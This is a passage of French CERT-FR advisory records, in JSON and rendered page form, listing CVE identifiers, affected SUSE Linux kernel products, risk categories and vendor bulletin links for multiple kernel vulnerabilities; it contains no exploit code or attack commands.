"name": "CVE-2022-50656",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50656"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-54036",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54036"
},
{
"name": "CVE-2023-54190",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54190"
},
{
"name": "CVE-2022-49604",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49604"
},
{
"name": "CVE-2023-53842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53842"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2022-50823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50823"
},
{
"name": "CVE-2023-53412",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53412"
},
{
"name": "CVE-2022-50719",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50719"
},
{
"name": "CVE-2022-50703",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50703"
},
{
"name": "CVE-2022-50763",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50763"
},
{
"name": "CVE-2025-40300",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40300"
},
{
"name": "CVE-2022-50727",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50727"
},
{
"name": "CVE-2022-50629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50629"
},
{
"name": "CVE-2022-50872",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50872"
},
{
"name": "CVE-2025-40280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40280"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2023-54127",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54127"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2023-54197",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54197"
},
{
"name": "CVE-2023-54244",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54244"
},
{
"name": "CVE-2022-50865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50865"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2023-54319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54319"
},
{
"name": "CVE-2025-68305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68305"
},
{
"name": "CVE-2022-50845",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50845"
},
{
"name": "CVE-2022-50754",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50754"
},
{
"name": "CVE-2023-54140",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54140"
},
{
"name": "CVE-2022-50856",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50856"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54055",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54055"
},
{
"name": "CVE-2023-54025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54025"
},
{
"name": "CVE-2023-53991",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53991"
},
{
"name": "CVE-2022-50861",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50861"
},
{
"name": "CVE-2022-50882",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50882"
},
{
"name": "CVE-2023-54300",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54300"
},
{
"name": "CVE-2025-39880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39880"
},
{
"name": "CVE-2023-54042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54042"
},
{
"name": "CVE-2022-50832",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50832"
},
{
"name": "CVE-2022-50638",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50638"
},
{
"name": "CVE-2023-52525",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52525"
},
{
"name": "CVE-2023-54302",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54302"
},
{
"name": "CVE-2023-53811",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53811"
},
{
"name": "CVE-2023-54051",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54051"
},
{
"name": "CVE-2023-54286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54286"
},
{
"name": "CVE-2023-54269",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54269"
},
{
"name": "CVE-2025-21765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21765"
},
{
"name": "CVE-2023-53808",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53808"
},
{
"name": "CVE-2022-50849",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50849"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2024-53070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53070"
},
{
"name": "CVE-2022-50760",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50760"
},
{
"name": "CVE-2023-54014",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54014"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2022-50858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50858"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2022-50888",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50888"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2024-36350",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36350"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71099"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2022-50640",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50640"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2022-50747",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50747"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68303"
},
{
"name": "CVE-2025-40259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40259"
},
{
"name": "CVE-2024-36349",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36349"
},
{
"name": "CVE-2023-53226",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53226"
},
{
"name": "CVE-2023-53827",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53827"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2023-54293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54293"
},
{
"name": "CVE-2022-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50782"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2022-50826",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50826"
},
{
"name": "CVE-2022-48853",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48853"
},
{
"name": "CVE-2022-50635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50635"
},
{
"name": "CVE-2023-53746",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53746"
},
{
"name": "CVE-2023-54171",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54171"
},
{
"name": "CVE-2022-50749",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50749"
},
{
"name": "CVE-2022-50618",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50618"
},
{
"name": "CVE-2023-54218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54218"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2022-50678",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50678"
},
{
"name": "CVE-2025-38684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38684"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2023-53850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53850"
},
{
"name": "CVE-2025-38209",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38209"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2023-53998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53998"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2023-54242",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54242"
},
{
"name": "CVE-2025-40363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40363"
},
{
"name": "CVE-2023-53852",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53852"
},
{
"name": "CVE-2022-50777",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50777"
},
{
"name": "CVE-2025-71156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71156"
},
{
"name": "CVE-2023-53862",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53862"
},
{
"name": "CVE-2026-22988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22988"
},
{
"name": "CVE-2022-50664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50664"
},
{
"name": "CVE-2023-50756",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50756"
},
{
"name": "CVE-2022-50643",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50643"
},
{
"name": "CVE-2025-68245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68245"
},
{
"name": "CVE-2023-53254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53254"
},
{
"name": "CVE-2023-54020",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54020"
},
{
"name": "CVE-2023-53996",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53996"
},
{
"name": "CVE-2023-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52999"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2023-54130",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54130"
},
{
"name": "CVE-2022-50625",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50625"
},
{
"name": "CVE-2023-54012",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54012"
},
{
"name": "CVE-2025-37913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37913"
},
{
"name": "CVE-2024-44987",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44987"
},
{
"name": "CVE-2025-38539",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38539"
},
{
"name": "CVE-2025-40181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40181"
},
{
"name": "CVE-2023-54292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54292"
},
{
"name": "CVE-2025-40132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40132"
},
{
"name": "CVE-2022-50232",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50232"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2023-54294",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54294"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2025-68178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68178"
},
{
"name": "CVE-2022-50614",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50614"
},
{
"name": "CVE-2023-54050",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54050"
},
{
"name": "CVE-2022-50828",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50828"
},
{
"name": "CVE-2025-39813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39813"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2022-50670",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50670"
},
{
"name": "CVE-2022-50868",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50868"
},
{
"name": "CVE-2025-40261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40261"
},
{
"name": "CVE-2023-54287",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54287"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2022-50876",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50876"
},
{
"name": "CVE-2025-40323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40323"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2022-50652",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50652"
},
{
"name": "CVE-2022-50732",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50732"
},
{
"name": "CVE-2023-54198",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54198"
},
{
"name": "CVE-2022-50671",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50671"
},
{
"name": "CVE-2023-54047",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54047"
},
{
"name": "CVE-2022-50653",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50653"
},
{
"name": "CVE-2023-54252",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54252"
},
{
"name": "CVE-2023-54019",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54019"
},
{
"name": "CVE-2023-54123",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54123"
},
{
"name": "CVE-2023-54236",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54236"
},
{
"name": "CVE-2025-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39829"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2022-50835",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50835"
},
{
"name": "CVE-2023-54189",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54189"
},
{
"name": "CVE-2025-68227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68227"
},
{
"name": "CVE-2025-40339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40339"
},
{
"name": "CVE-2023-54260",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54260"
},
{
"name": "CVE-2022-50884",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50884"
},
{
"name": "CVE-2023-54230",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54230"
},
{
"name": "CVE-2022-50786",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50786"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2023-54299",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54299"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-68767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2023-53830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53830"
},
{
"name": "CVE-2025-40142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40142"
},
{
"name": "CVE-2022-50850",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50850"
},
{
"name": "CVE-2023-54219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54219"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2023-53847",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53847"
},
{
"name": "CVE-2025-39836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39836"
},
{
"name": "CVE-2023-54325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54325"
},
{
"name": "CVE-2023-54121",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54121"
},
{
"name": "CVE-2022-50770",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50770"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-40087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40087"
},
{
"name": "CVE-2022-50755",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50755"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-13T00:00:00",
"last_revision_date": "2026-02-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0170",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-13T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es, une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es et un contournement de la politique de s\u00e9curit\u00e9.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0472-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260472-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0471-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260471-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0474-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260474-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0473-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260473-1"
},
{
"published_at": "2026-02-09",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0411-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260411-1"
},
{
"published_at": "2026-02-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0447-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260447-1"
},
{
"published_at": "2026-02-12",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0475-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260475-1"
}
]
}
CERTFR-2026-AVI-0225
Vulnerability from certfr_avis - Published: 2026-02-27 - Updated: 2026-02-27
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une élévation de privilèges et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SUSE | SUSE Linux Enterprise High Availability Extension | SUSE Linux Enterprise High Availability Extension 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP7 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing 15 SP4 | ||
| SUSE | SUSE Manager Retail Branch Server | SUSE Manager Retail Branch Server 4.3 | ||
| SUSE | openSUSE Leap | openSUSE Leap 15.4 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP4 LTSS | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.4 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.3 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.3 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP4 | ||
| SUSE | SUSE Manager Proxy | SUSE Manager Proxy 4.3 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP4 | ||
| SUSE | SUSE Linux Micro | SUSE Linux Micro 6.0 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP7 | ||
| SUSE | SUSE Manager Server | SUSE Manager Server 4.3 | ||
| SUSE | SUSE Real Time Module | SUSE Real Time Module 15-SP7 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.4 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP4 | ||
| SUSE | SUSE Linux Micro Extras | SUSE Linux Micro Extras 6.0 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Retail Branch Server 4.3",
"product": {
"name": "SUSE Manager Retail Branch Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.4",
"product": {
"name": "openSUSE Leap",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing LTSS 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP4 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.0",
"product": {
"name": "SUSE Linux Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Real Time Module 15-SP7",
"product": {
"name": "SUSE Real Time Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP4",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro Extras 6.0",
"product": {
"name": "SUSE Linux Micro Extras",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-50669",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50669"
},
{
"name": "CVE-2023-53761",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53761"
},
{
"name": "CVE-2023-53814",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53814"
},
{
"name": "CVE-2025-40166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40166"
},
{
"name": "CVE-2023-53407",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53407"
},
{
"name": "CVE-2023-54076",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54076"
},
{
"name": "CVE-2025-40273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40273"
},
{
"name": "CVE-2023-54208",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54208"
},
{
"name": "CVE-2023-53714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53714"
},
{
"name": "CVE-2025-68230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68230"
},
{
"name": "CVE-2023-54039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54039"
},
{
"name": "CVE-2025-40064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40064"
},
{
